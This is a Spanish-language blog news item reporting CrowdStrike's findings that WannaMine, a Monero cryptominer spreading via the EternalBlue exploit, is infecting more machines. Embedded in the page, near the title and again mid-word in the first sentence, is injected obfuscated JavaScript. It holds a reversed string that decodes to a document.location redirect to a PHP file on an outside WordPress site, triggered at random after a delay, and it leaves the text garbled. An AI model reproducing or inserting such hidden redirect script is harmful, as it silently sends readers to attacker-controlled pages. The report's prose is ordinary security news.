Crecen las infecciones de WannaMine, un malware para minar criptomoneda
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok=vboqXgpu” width=”624″ height=”352″ /><br />
Malware, NSA</p>
<p>En los últimos meses, la incidencia del cryp<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tohacking ha ido en aumento y en la actualidad se ha convertido en una de las principales amenazas de seguridad. Ahora, investigadores de la compañía de seguridad CrowdStrike han detectado un incremento de las infecciones de un malware para minar criptomonedas que aprovecha la vulnerabilidad EternalBlue para instalarse en el ordenador de las víctimas.
El virus es conocido como WannaMine y fue descubierto por primera vez por la firma de seguridad Panda Security. El equipo identificó el malware, que utiliza el famoso exploit de la NSA EternalBlue, el mismo que utilizó el ransomware WannaCry.
El agujero fue publicado por los Shadow Brokers, el grupo hacker que hackeó la NSA en 2016, y aunque Microsoft lanzó un parche en abril de 2017, lo cierto es que hay muchos equipos vulnerables porque todavía no han sido actualizados. Además del exploit EternalBlue, este minero también utiliza otro sistema para penetrar en el sistema, de manera que aunque el ordenador esté parcheado también puede ser infectado.
De acuerdo con el nuevo informe, WannaMine puede infectar un ordenador de formas muy variadas, desde un enlace malicioso en un correo electrónico o una página web hasta un ataque de acceso remoto. Utiliza tanto herramientas de hacking como scripts para propagarse por redes corporativas, poniendo a trabajar los recursos de los equipos para minar la criptomoneda Monero sin el conocimiento del usuario. En la mayoría de los casos, la víctima no notará nada, salvo que el ordenador funciona más lento.
WannaMine no es el primer malware minero que utiliza EternalBlue para infectar los equipos. Adylkuzz fue el primero en aprovechar este agujero, pero WannaMine destaca por ser mucho más sofisticado. Según el informe de CrowdStrike puede hacer que algunas empresas no puedan operar durante días e incluso semanas. “Las implicaciones de la minería de criptomonedas no son solo ‘Oh, maldición, perdí parte de mi CPU’, en realidad obstaculiza la forma en la que las empresas llevan a cabo sus operaciones y causan tiempos muertos”, explica la compañía de seguridad.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.